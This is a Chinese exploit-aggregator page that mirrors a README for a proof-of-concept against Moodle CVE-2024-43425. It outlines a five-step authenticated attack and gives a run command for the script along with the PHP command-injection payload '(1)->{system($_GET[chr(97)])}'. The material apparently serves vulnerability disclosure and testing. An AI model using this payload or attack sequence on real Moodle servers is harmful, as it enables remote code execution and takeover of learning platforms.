POC详情: a767e76dd6cc30ac0aad2bf820d1fd436ffab910

来源
https://github.com/aninfosec/CVE-2024-43425-Poc
关联漏洞
标题: Moodle 安全漏洞 (CVE-2024-43425)
描述:Moodle是Moodle开源的一套免费的电子学习软件平台,也称课程管理系统、学习管理系统或虚拟学习环境。 Moodle存在安全漏洞,该漏洞源于需要额外的限制来避免计算问题类型中的远程代码执行风险。
介绍
# CVE-2024-43425-Poc

CVE Overview
CVE ID: CVE-2024-43425

Description: Moodle allows an authenticated teacher-level user to upload a malicious calculated question via the quiz editor interface.
Impact: Remote Code Execution (RCE)
Cause: Improper sanitization of mathematical payloads inside calculated questions, which leads to command injection through the dataset wizard.

##Requirements:

Valid login credentials
Access to quiz editing interface (usually a teacher or admin role)
Known cmid (quiz module ID) and courseid

##This script performs a 5-step attack:

Step	Description
1️	Fetch login token (logintoken)
2️	Log in and establish a valid MoodleSession
3️	Extract sesskey, ctxid, and category from the quiz edit page
4️	Upload a specially crafted calculated question with an RCE payload
5️	Trigger the payload through the dataset wizard page

##Usage Instructions

Requirements:
Python 3
Python libraries: requests, bs4 (BeautifulSoup)
~~~
pip3 install requests bs4
~~~
~~~
python3 exploit_cve_2024_43425.py \
  --url http://192.168.2.12/moodle \
  --username test \
  --password 'Test@123' \
  --courseid 1 \
  --cmid 1 \
  --cmd 'whoami'
~~~

##Payload used:
~~~
answer[0] = "(1)->{system($_GET[chr(97)])}"
~~~
文件快照

 [4.0K]  /data/pocs/a767e76dd6cc30ac0aad2bf820d1fd436ffab910
├── [9.6K]  exploit.py
└── [1.2K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。